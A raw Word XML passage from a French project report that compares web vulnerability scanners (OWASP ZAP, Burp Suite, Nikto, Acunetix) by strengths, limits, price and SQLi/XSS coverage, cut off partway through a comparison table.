    <w:p w14:paraId="7440EBF3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Points forts : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>open source, communauté active (500+ contributeurs), extensible via 50+ add-ons, API REST pour CI/CD, scans actif et passif, authentification avancée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8CB0D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="C80000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Limites : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>interface graphique complexe, lent sur les grandes applications (pas de parallélisme natif), configuration initiale fastidieuse, faux positifs nombreux sur les applications complexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82A2A3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.5.2  Burp Suite (PortSwigger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA63D3A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Burp Suite est la référence professionnelle absolue pour les tests d'intrusion web. Développé par PortSwigger, il combine un proxy intercepteur, un spider, un scanner automatisé, un répéteur de requêtes, un intrus (fuzzer), un décodeur et un comparateur. La version Community est gratuite mais dépourvue du scanner automatisé ; la version Professional (449 USD/an/utilisateur) offre un scanner complet avec corrélation des vulnérabilités et génération de rapports professionnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87B722" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Points forts : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>le plus complet du marché, très fiable (peu de faux positifs), outils manuels avancés, extensible via BApp Store (200+ extensions), intégration CI/CD en Enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A895DC1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="C80000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Limites : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>version complète très onéreuse (4 490 USD/an Enterprise), fermé et propriétaire, scanner indisponible en version gratuite, courbe d'apprentissage importante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE9D1E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.5.3  Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E3FE0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nikto est un scanner web léger et rapide en ligne de commande, écrit en Perl. Il se concentre principalement sur la détection de fichiers sensibles exposés, de versions de serveurs obsolètes, de configurations dangereuses et de pages d'administration accessibles. Il n'est pas conçu pour la détection de vulnérabilités applicatives comme les injections SQL ou XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C251BC9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Points forts : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>rapide (&lt; 30s), simple d'utilisation, open source, bonne couverture des misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7DCB1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="C80000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Limites : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>pas de détection SQLi/XSS/SSRF, pas d'authentification, beaucoup de faux positifs, non maintenu activement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA3C1B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.5.4  Acunetix / Invicti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970AE6D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Acunetix (acquis par Invicti Security) est un scanner commercial haut de gamme proposant une couverture étendue de l'OWASP Top 10, une interface web moderne, des rapports détaillés avec preuve de concept, et une intégration avec les principaux outils DevOps (Jira, GitHub, Azure DevOps). Son moteur DeepScan supporte les applications JavaScript SPA et les APIs REST/GraphQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E06489" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Points forts : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>couverture très étendue, support SPA/API, rapports professionnels, peu de faux positifs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DCCEA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="C80000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Limites : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>prix très élevé (5 000–25 000 USD/an), propriétaire, non accessible pour projets académiques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AEB20" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.5.5  Tableau Comparatif Détaillé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AF45A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Comparaison détaillée des outils de scan de vulnérabilités web</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2544"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="1133"/>
        <w:gridCol w:w="1416"/>
        <w:gridCol w:w="1414"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="17744C9C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28CD16B6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EECFAE3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4461CE33" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77305E67" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15A29A7E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acunetix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A0D9E08" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Notre outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="6E3BB636" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63ABBCE2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Licence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E7A1D7E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DCA3A1F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Freemium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12249ED1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21ED6C74" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C665E48" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="5DE842D7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="03CA2F74" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Prix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7E8B361A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gratuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3DA76FCB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0–449$/an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5B788B65" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gratuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3A889AED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5000–25000$/an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="25AC4BE4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gratuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="39B31148" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32592A37" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B56057" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="463DB3B6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4824193F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BE94E58" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306F523F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="03353434" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="25AABB31" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="21DC1DF2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="147589E9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
